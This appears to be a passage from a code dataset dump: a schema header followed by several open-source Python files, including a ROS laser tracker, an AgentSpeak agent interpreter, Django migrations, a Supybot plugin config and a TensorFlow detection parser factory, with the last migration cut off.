repo_name
stringlengths 5
92
| path
stringlengths 4
221
| copies
stringclasses 19
values | size
stringlengths 4
6
| content
stringlengths 766
896k
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 32
997
| alpha_frac
float64 0.25
0.96
| autogenerated
bool 1
class | ratio
float64 1.5
13.6
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
pedrombmachado/summitxl
|
simple_follower/scripts/laserTracker.py
|
1
|
3097
|
#!/usr/bin/env python
# test mail: chutter@uos.de
import rospy
import thread, threading
import time
import numpy as np
from sensor_msgs.msg import Joy, LaserScan
from geometry_msgs.msg import Twist, Vector3
from std_msgs.msg import String as StringMsg
from simple_follower.msg import position as PositionMsg
class laserTracker:
def __init__(self):
self.lastScan=None
self.winSize = rospy.get_param('~winSize')
self.deltaDist = rospy.get_param('~deltaDist')
self.scanSubscriber = rospy.Subscriber('/hokuyo_base/scan', LaserScan, self.registerScan)
self.positionPublisher = rospy.Publisher('/object_tracker/current_position', PositionMsg,queue_size=3)
self.infoPublisher = rospy.Publisher('/object_tracker/info', StringMsg, queue_size=3)
def registerScan(self, scan_data):
# registers laser scan and publishes position of closest object (or point rather)
ranges = np.array(scan_data.ranges)
# sort by distance to check from closer to further away points if they might be something real
sortedIndices = np.argsort(ranges)
minDistanceID = None
minDistance = float('inf')
if(not(self.lastScan is None)):
# if we already have a last scan to compare to:
for i in sortedIndices:
# check all distance measurements starting from the closest one
tempMinDistance = ranges[i]
# now we check if this might be noise:
# get a window. in it we will check if there has been a scan with similar distance
# in the last scan within that window
# we kneed to clip the window so we don't have an index out of bounds
windowIndex = np.clip([i-self.winSize, i+self.winSize+1],0,len(self.lastScan))
window = self.lastScan[windowIndex[0]:windowIndex[1]]
with np.errstate(invalid='ignore'):
# check if any of the scans in the window (in the last scan) has a distance close enough to the current one
if(np.any(abs(window-tempMinDistance)<=self.deltaDist)):
# this will also be false for all tempMinDistance = NaN or inf
# we found a plausible distance
minDistanceID = i
minDistance = ranges[minDistanceID]
break # at least one point was equally close
# so we found a valid minimum and can stop the loop
self.lastScan=ranges
#catches no scan, no minimum found, minimum is actually inf
if(minDistance > scan_data.range_max):
#means we did not really find a plausible object
# publish warning that we did not find anything
rospy.logwarn('laser no object found')
self.infoPublisher.publish(StringMsg('laser:nothing found'))
else:
# calculate angle of the objects location. 0 is straight ahead
minDistanceAngle = scan_data.angle_min + minDistanceID * scan_data.angle_increment
# here we only have an x angle, so the y is set arbitrarily
self.positionPublisher.publish(PositionMsg(minDistanceAngle, 42, minDistance))
if __name__ == '__main__':
print('starting')
rospy.init_node('laser_tracker')
tracker = laserTracker()
print('seems to do something')
try:
rospy.spin()
except rospy.ROSInterruptException:
print('exception')
|
gpl-3.0
| 31,351,464,826,698,900
| 35.435294
| 112
| 0.723926
| false
| 3.47587
| false
| false
| false
|
jmanday/Informatica
|
DAI/Practicas/resolucionPracticas_1_2/sesion02/ej_04.py
|
1
|
1510
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Practicas de Desarrollo de Aplicaciones para Internet (DAI)
# Copyright (C) 2013 - Zerjillo (zerjioi@ugr.es)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from moon import *
from sun import *
from formulario import *
import web
urls = (
'/sun(.*)', 'Sun', # Todo lo que empiece por "sun" lo gestionará la clase Sun
'/moon(.*)', 'Moon', # Todo lo que empiece por "moon" (o la página principal) lo gestionará la clase Moon
'/()', 'Moon',
'/formulario', 'Formulario', #
)
app = web.application(urls, globals())
# Gestionamos el error 404 (not found)
def notfound():
return web.notfound("Lo siento, la página que buscas no existe. Prueba con /formulario")
# Asignamos el gestor del not found de la aplicación web a la función anterior
app.notfound = notfound
if __name__ == "__main__":
app.run()
|
gpl-3.0
| -1,203,772,582,571,132,200
| 32.466667
| 116
| 0.689701
| false
| 3.329646
| false
| false
| false
|
andrellsantos/agentspeak-py
|
agentspeak-py/agent.py
|
1
|
13361
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import random
import copy
from agentspeak import *
class Agent:
def __init__(self, name, belief_base, initial_goals, plan_library):
self.name = name
self.__belief_base = belief_base
# Conjunto de planos P
self.__plan_library = plan_library
# Conjunto de eventos E
self.__events = []
# Adiciona os objetivos iniciais no conjunto de eventos E
for initial_goal in initial_goals:
triggering_event = TriggeringEvent('+', initial_goal)
event = Event(triggering_event, TRUE_INTENTION)
self.__events.append(event)
self.__messages = []
self.__intentions = []
def run(self, perceptions = [], messages = {}):
# Função de verificação de mensagens
self.__check_messages(messages)
# Função de revisão de crenças (BRF)
self.__belief_revision_function(perceptions)
# Se não possuir nenhum elemento no conjunto de eventos ou conjunto de planos
if not self.__events and not self.__intentions:
return None
relevant_plans = []
while len(self.__events) > 0 and len(relevant_plans) == 0:
# Função de seleção de evento
event = self._event_selection()
# Função de unificação para seleção dos planos relevantes
relevant_plans = self.__unify_event(event)
if relevant_plans:
# Função de substituição para seleção dos planos relevantes
applicable_plans = self.__unify_context(relevant_plans)
if applicable_plans:
# Função de seleção do plano pretendido
intended_mean = self._intended_means_selection(applicable_plans)
# Função de atualização do conjunto de intenções
self.__update_intentions(intended_mean)
# Função de selecão da intenção que será executada
intention = self._intention_selection()
# Função .print(belief_base)
if intention and isinstance(intention, Action):
if isinstance(intention.literal, Print) and not intention.literal.content:
intention.literal.content = str(self.__belief_base)
# Retorna a intenção que será executada no ambiente
return intention
# Função de verificação de mensagens
def __check_messages(self, messages):
self.__messages.extend(messages.pop(self.name, []))
# Processa as mensagens recebidas
# [TO-DO] Digamos que eu tenha diversas mensagens para um agente.. eu processo tudo no mesmo
# ciclo de interpretação?
for message in self.__messages:
self.__process_messages(message.sender, message.type, message.literal)
# Limpa a caixa de mensagens do agente
self.__messages = []
def __process_messages(self, sender, type, literal):
# Tell
# O agente que enviou a mensagem pretende que o agente receptor possua uma crença em que
# o literal da mensagem seja verdadeiro.
if type == 'tell':
self.__belief_base.add(literal)
# Untell
# O agente que enviou a mensagem pretende que o agente receptor não possua uma crença em que
# o literal da mensagem seja verdadeiro.
elif type == 'untell':
self.__belief_base.remove(literal)
# Achieve
# O agente que enviou a mensagem solicita que o agente receptor tente alcançar um estado
# em que o conteúdo do literal da mensagem seja verdadeiro, isto é, delegando um objetivo
# para o agente receptor.
elif type == 'achieve':
goal = Goal('!' + literal)
triggering_event = TriggeringEvent('+', goal)
event = Event(triggering_event, TRUE_INTENTION)
self.__events.append(event)
# Unachieve
# O agente que enviou a mensagem solicita que o agente receptor desista do objetivo de atingir
# um estado em que o conteúdo do literal da mensagem seja verdadeiro.
elif type == 'unachieve':
goal = Goal('!' + literal)
triggering_event = TriggeringEvent('-', goal)
event = Event(triggering_event, TRUE_INTENTION)
self.__events.append(event)
# AskOne
elif type == 'askOne':
raise 'O tipo \'askOne\' está pendente de implementação na função .send()!'
# AskAll
elif type == 'askAll':
raise 'O tipo \'askAll\' está pendente de implementação na função .send()!'
# TellHow
elif type == 'tellHow':
raise 'O tipo \'tellHow\' está pendente de implementação na função .send()!'
# UntellHow
elif type == 'untellHow':
raise 'O tipo \'untellHow\' está pendente de implementação na função .send()!'
# AskHow
elif type == 'askHow':
raise 'O tipo \'askHow\' está pendente de implementação na função .send()!'
else:
raise 'Tipo incorreto da função .send()!'
# [TO-DO] Fazer (Página 118)
# Função de revisão de crenças (BRF)
def __belief_revision_function(self, perceptions):
# Recebe as informações provenientes do ambiente e as confronta com o seu conjunto de crenças
# Caso as percepções do ambiente sejam diferentes, o conjunto de crenças é atualizado para que
# reflitam o novo estado do ambiente
# Cada crença modificada gera um novo evento que é adicionado no conjunto de eventos
# Cada literal das percepções que não está na base de conhecimento é adicionado no conjunto de eventos
remove_list = []
for perception in perceptions:
if perception not in self.__belief_base.items:
remove_list.append(perception)
for item in remove_list:
triggering_event = self.__belief_base.add(item)
event = Event(triggering_event, TRUE_INTENTION)
self.__events.append(event)
# Cada literal da base de conhecimento que não está nas percepções é removido do conjunto de eventos
remove_list = []
for belief in self.__belief_base.items:
if belief not in perceptions:
remove_list.append(belief)
for item in remove_list:
triggering_event = self.__belief_base.remove(item)
event = Event(triggering_event, TRUE_INTENTION)
self.__events.append(event)
# Função de seleção de evento
def _event_selection(self):
# Escolhe um único evento do conjunto de eventos
event = None
if self.__events:
event = self.__events.pop(0)
return event
# Função de unificação para seleção dos planos relevantes
def __unify_event(self, event):
# Encontra os planos relevantes unificando os eventos ativadores com os cabeçalhos do conjunto de planos
relevant_plans = []
theta = {}
for plan in self.__plan_library:
unification = unify(event.triggering_event.literal, plan.triggering_event.literal, theta)
if unification != None:
plan = self.__substitute_unifier(unification, plan)
relevant_plans.append(plan)
return relevant_plans
# Função de substituição da unificação de um plano
def __substitute_unifier(self, unification, plan):
if len(unification) > 0:
# Cria um cópia do plano
plan = copy.deepcopy(plan)
# Realiza a substituição do evento arivador
plan.triggering_event = substitute(unification, plan.triggering_event.literal)
# Realiza a substituição do contexto
plan_context = []
for context in plan.context:
plan_context.append(substitute(unification, context))
plan.context = plan_context
# Realiza a substituição do corpo
plan_body = []
for body in plan.body:
if isinstance(body, Literal):
body = substitute(unification, body)
elif isinstance(body, Goal):
body.content = substitute(unification, body.content)
body.literal = substitute(unification, body.literal)
plan_body.append(body)
plan.body = plan_body
return plan
# Função de substituição para seleção dos planos relevantes
def __unify_context(self, relevant_plans):
applicable_plans = []
for plan in relevant_plans:
if self.__relevant_unifier(plan.context):
applicable_plans.append(plan)
return applicable_plans
def __unify_with_belief_base(self, content):
theta = {}
for belief in self.__belief_base.items:
if unify(content, belief, theta) != None:
return True
return False
def __relevant_unifier(self, context = []):
if not context:
return False
if len(context) == 1:
context = context[0]
if context.functor == 'true':
return True
if context.functor == 'not':
context = context.args[0]
ret = self.__unify_with_belief_base(context)
return not ret
relevant_unifier = self.__unify_with_belief_base(context)
return relevant_unifier
else:
relevant_unifier = self.__relevant_unifier(context[:1]) and self.__relevant_unifier(context[1:])
return relevant_unifier
# Função de seleção do plano pretendido
def _intended_means_selection(self, applicable_plans):
# Escolhe um único plano aplicável do conjunto de planos aplicáveis
applicable_plan = None
if applicable_plans:
applicable_plan = applicable_plans.pop(0)
# applicable_plan = random.choice(applicable_plans)
return applicable_plan
def __update_intentions(self, intended_mean):
if intended_mean:
intention = copy.deepcopy(intended_mean)
self.__intentions.append(intention)
# Função de selecão da intenção que será executada
def _intention_selection(self):
# Escolhe uma única intenção do conjunto de intenções
intention = None
while not intention:
if self.__intentions:
# Definição 13: Seleciona uma intenção i contida no topo do
# conjunto de intenções I.
intention = self.__intentions[-1]
if intention.body:
copy_intention = copy.deepcopy(intention)
literal = intention.body.pop(0)
if isinstance(literal, Goal):
if literal.type == '!':
# Definição 13: Se a fórmula no corpo de 'i' for um objetivo de realização,
# um evento do tipo <+!g(t), i> é adicionado no conjunto de eventos e a
# intenção que gerou o evento é considerada executada
triggering_event = TriggeringEvent('+', copy.deepcopy(literal))
event = Event(triggering_event, copy_intention)
self.__events.append(event)
intention = True
elif literal.type == '?':
# Definição 14: No caso da fórmula do corpo da intenção 'i' ser um evento de
# teste, o conjunto de crenças é percorrido para encontrar um átomo de crenças
# que unifique o predicado de teste. Se encontrado, o objetivo é removido do
# conjunto de intenções, caso contrário, não executa os demais literias do corpo.
theta = {}
has_unification = False
for belief in self.__belief_base.items:
unification = unify(literal.content, belief, theta)
if unification != None:
has_unification = True
break
if has_unification:
intention = True
else:
self.__intentions.remove(intention)
intention = None
else:
# Definição 15: Se a fórmula no corpo da intenção 'i' for uma ação a ser realizada
# pelo agente no ambiente, o interpretador atualiza o estado do ambiente com a ação
# requerida e remove a ação do conjunto de intenções
intention = Action(self.name, literal)
else:
self.__intentions.remove(intention)
intention = None
else:
break
return intention
|
gpl-3.0
| 7,225,907,124,630,131,000
| 43.016722
| 112
| 0.573708
| false
| 3.852459
| false
| false
| false
|
openhealthcare/randomise.me
|
rm/trials/migrations/0020_auto__add_field_report_variable__chg_field_report_score.py
|
1
|
7439
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Report.variable'
db.add_column(u'trials_report', 'variable',
self.gf('django.db.models.fields.related.ForeignKey')(default=2, to=orm['trials.Variable']),
keep_default=False)
# Changing field 'Report.score'
db.alter_column(u'trials_report', 'score', self.gf('django.db.models.fields.IntegerField')(null=True))
def backwards(self, orm):
# Deleting field 'Report.variable'
db.delete_column(u'trials_report', 'variable_id')
# User chose to not deal with backwards NULL issues for 'Report.score'
raise RuntimeError("Cannot reverse this migration. 'Report.score' and its values cannot be restored.")
models = {
u'trials.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'trial': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['trials.Trial']"})
},
u'trials.participant': {
'Meta': {'object_name': 'Participant'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['trials.Group']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'trial': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['trials.Trial']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['userprofiles.RMUser']"})
},
u'trials.report': {
'Meta': {'object_name': 'Report'},
'date': ('django.db.models.fields.DateField', [], {}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['trials.Group']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'trial': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['trials.Trial']"}),
'variable': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['trials.Variable']"})
},
u'trials.singleuserallocation': {
'Meta': {'object_name': 'SingleUserAllocation'},
'date': ('django.db.models.fields.DateField', [], {}),
'group': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'trial': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['trials.SingleUserTrial']"})
},
u'trials.singleuserreport': {
'Meta': {'object_name': 'SingleUserReport'},
'date': ('django.db.models.fields.DateField', [], {}),
'group': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {}),
'trial': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['trials.SingleUserTrial']"})
},
u'trials.singleusertrial': {
'Meta': {'object_name': 'SingleUserTrial'},
'finish_date': ('django.db.models.fields.DateField', [], {}),
'group_a': ('django.db.models.fields.TextField', [], {}),
'group_b': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['userprofiles.RMUser']"}),
'question': ('django.db.models.fields.TextField', [], {}),
'start_date': ('django.db.models.fields.DateField', [], {}),
'variable': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
u'trials.trial': {
'Meta': {'object_name': 'Trial'},
'description': ('django.db.models.fields.TextField', [], {}),
'featured': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'finish_date': ('django.db.models.fields.DateField', [], {}),
'group_a': ('django.db.models.fields.TextField', [], {}),
'group_a_expected': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'group_b': ('django.db.models.fields.TextField', [], {}),
'group_b_impressed': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'max_participants': ('django.db.models.fields.IntegerField', [], {}),
'min_participants': ('django.db.models.fields.IntegerField', [], {}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['userprofiles.RMUser']"}),
'participants': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'private': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'question': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'recruiting': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'start_date': ('django.db.models.fields.DateField', [], {}),
'style': ('django.db.models.fields.CharField', [], {'max_length': '2'})
},
u'trials.variable': {
'Meta': {'object_name': 'Variable'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'style': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'trial': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['trials.Trial']"})
},
u'userprofiles.rmuser': {
'Meta': {'object_name': 'RMUser'},
'account': ('django.db.models.fields.CharField', [], {'default': "'st'", 'max_length': '2'}),
'email': ('django.db.models.fields.EmailField', [], {'unique': 'True', 'max_length': '254'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40', 'db_index': 'True'})
}
}
complete_apps = ['trials']
|
agpl-3.0
| -7,017,855,676,726,162,000
| 61.521008
| 137
| 0.54752
| false
| 3.7195
| false
| false
| false
|
agconti/Ember-Demo
|
ember_demo/users/migrations/0002_set_site_domain_and_name.py
|
1
|
4352
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import DataMigration
from django.conf import settings
from django.db import models
class Migration(DataMigration):
def forwards(self, orm):
"""Set site domain and name."""
Site = orm['sites.Site']
site = Site.objects.get(id=settings.SITE_ID)
site.domain = "example.com"
site.name = "ember_demo"
site.save()
def backwards(self, orm):
"""Revert site domain and name to default."""
Site = orm['sites.Site']
site = Site.objects.get(id=settings.SITE_ID)
site.domain = 'example.com'
site.name = 'example.com'
site.save()
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'sites.site': {
'Meta': {'ordering': "(u'domain',)", 'object_name': 'Site', 'db_table': "u'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'users.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
}
}
complete_apps = ['sites', 'users']
symmetrical = True
|
mit
| 6,375,379,218,639,753,000
| 58.630137
| 195
| 0.554917
| false
| 3.644891
| false
| false
| false
|
kg-bot/SupyBot
|
plugins/MilleBornes/config.py
|
1
|
2718
|
###
# Copyright (c) 2010, Valentin Lorentz
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
import supybot.conf as conf
import supybot.registry as registry
try:
from supybot.i18n import PluginInternationalization
from supybot.i18n import internationalizeDocstring
_ = PluginInternationalization('MilleBornes')
except:
# This are useless functions that's allow to run the plugin on a bot
# without the i18n plugin
_ = lambda x:x
internationalizeDocstring = lambda x:x
def configure(advanced):
# This will be called by supybot to configure this module. advanced is
# a bool that specifies whether the user identified himself as an advanced
# user or not. You should effect your configuration by manipulating the
# registry as appropriate.
from supybot.questions import expect, anything, something, yn
conf.registerPlugin('MilleBornes', True)
MilleBornes = conf.registerPlugin('MilleBornes')
# This is where your configuration variables (if any) should go. For example:
# conf.registerGlobalValue(MilleBornes, 'someConfigVariableName',
# registry.Boolean(False, _("""Help for someConfigVariableName.""")))
# vim:set shiftwidth=4 tabstop=4 expandtab textwidth=79:
|
gpl-3.0
| 5,178,330,492,657,698,000
| 45.067797
| 79
| 0.765636
| false
| 4.266876
| true
| false
| false
|
tombstone/models
|
official/vision/detection/dataloader/factory.py
|
1
|
4932
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Model architecture factory."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from official.vision.detection.dataloader import maskrcnn_parser
from official.vision.detection.dataloader import retinanet_parser
from official.vision.detection.dataloader import shapemask_parser
def parser_generator(params, mode):
"""Generator function for various dataset parser."""
if params.architecture.parser == 'retinanet_parser':
anchor_params = params.anchor
parser_params = params.retinanet_parser
parser_fn = retinanet_parser.Parser(
output_size=parser_params.output_size,
min_level=params.architecture.min_level,
max_level=params.architecture.max_level,
num_scales=anchor_params.num_scales,
aspect_ratios=anchor_params.aspect_ratios,
anchor_size=anchor_params.anchor_size,
match_threshold=parser_params.match_threshold,
unmatched_threshold=parser_params.unmatched_threshold,
aug_rand_hflip=parser_params.aug_rand_hflip,
aug_scale_min=parser_params.aug_scale_min,
aug_scale_max=parser_params.aug_scale_max,
use_autoaugment=parser_params.use_autoaugment,
autoaugment_policy_name=parser_params.autoaugment_policy_name,
skip_crowd_during_training=parser_params.skip_crowd_during_training,
max_num_instances=parser_params.max_num_instances,
use_bfloat16=params.architecture.use_bfloat16,
mode=mode)
elif params.architecture.parser == 'maskrcnn_parser':
anchor_params = params.anchor
parser_params = params.maskrcnn_parser
parser_fn = maskrcnn_parser.Parser(
output_size=parser_params.output_size,
min_level=params.architecture.min_level,
max_level=params.architecture.max_level,
num_scales=anchor_params.num_scales,
aspect_ratios=anchor_params.aspect_ratios,
anchor_size=anchor_params.anchor_size,
rpn_match_threshold=parser_params.rpn_match_threshold,
rpn_unmatched_threshold=parser_params.rpn_unmatched_threshold,
rpn_batch_size_per_im=parser_params.rpn_batch_size_per_im,
rpn_fg_fraction=parser_params.rpn_fg_fraction,
aug_rand_hflip=parser_params.aug_rand_hflip,
aug_scale_min=parser_params.aug_scale_min,
aug_scale_max=parser_params.aug_scale_max,
skip_crowd_during_training=parser_params.skip_crowd_during_training,
max_num_instances=parser_params.max_num_instances,
include_mask=params.architecture.include_mask,
mask_crop_size=parser_params.mask_crop_size,
use_bfloat16=params.architecture.use_bfloat16,
mode=mode)
elif params.architecture.parser == 'shapemask_parser':
anchor_params = params.anchor
parser_params = params.shapemask_parser
parser_fn = shapemask_parser.Parser(
output_size=parser_params.output_size,
min_level=params.architecture.min_level,
max_level=params.architecture.max_level,
num_scales=anchor_params.num_scales,
aspect_ratios=anchor_params.aspect_ratios,
anchor_size=anchor_params.anchor_size,
use_category=parser_params.use_category,
outer_box_scale=parser_params.outer_box_scale,
box_jitter_scale=parser_params.box_jitter_scale,
num_sampled_masks=parser_params.num_sampled_masks,
mask_crop_size=parser_params.mask_crop_size,
mask_min_level=parser_params.mask_min_level,
mask_max_level=parser_params.mask_max_level,
upsample_factor=parser_params.upsample_factor,
match_threshold=parser_params.match_threshold,
unmatched_threshold=parser_params.unmatched_threshold,
aug_rand_hflip=parser_params.aug_rand_hflip,
aug_scale_min=parser_params.aug_scale_min,
aug_scale_max=parser_params.aug_scale_max,
skip_crowd_during_training=parser_params.skip_crowd_during_training,
max_num_instances=parser_params.max_num_instances,
use_bfloat16=params.architecture.use_bfloat16,
mask_train_class=parser_params.mask_train_class,
mode=mode)
else:
raise ValueError('Parser %s is not supported.' % params.architecture.parser)
return parser_fn
|
apache-2.0
| -2,585,703,879,675,773,000
| 46.883495
| 80
| 0.70884
| false
| 3.6
| false
| false
| false
|
CivicKnowledge/metaeditor
|
compat/tests/helpers.py
|
1
|
1050
|
# -*- coding: utf-8 -*-
import fudge
local_cache = {}
def patch_identifier_index(result):
""" Patches ambry search identifier to return given result. """
from ambry.library.search import Search
# convert each dict in the result to the hit expected by searcher.
class MyDict(dict):
pass
new_result = []
for i, one in enumerate(result):
my = MyDict()
my.update(one)
my.score = i
new_result.append(my)
class FakeSearcher(object):
def search(self, query, limit=20):
return new_result
def __enter__(self, *args, **kwargs):
return self
def __exit__(self, *args, **kwargs):
pass
class FakeIdentifierIndex(object):
schema = '?'
def searcher(*args, **kwargs):
return FakeSearcher()
local_cache['patched_identifier_index'] = fudge.patch_object(
Search, 'identifier_index', FakeIdentifierIndex())
def restore_patched():
local_cache['patched_identifier_index'].restore()
|
mit
| -950,198,280,900,492,700
| 22.333333
| 70
| 0.598095
| false
| 4.038462
| false
| false
| false
|
rastrexando-eu/rastrexando-eu
|
core/migrations/0060_auto_20180128_1205.py
|
1
|
1505
|
# Generated by Django 2.0.1 on 2018-01-28 11:05
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('core', '0059_config'),
]
operations = [
migrations.AlterField(
model_name='config',
name='current_season',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, to='core.Season', verbose_name='Temporada Actual'),
),
migrations.AlterField(
model_name='medialink',
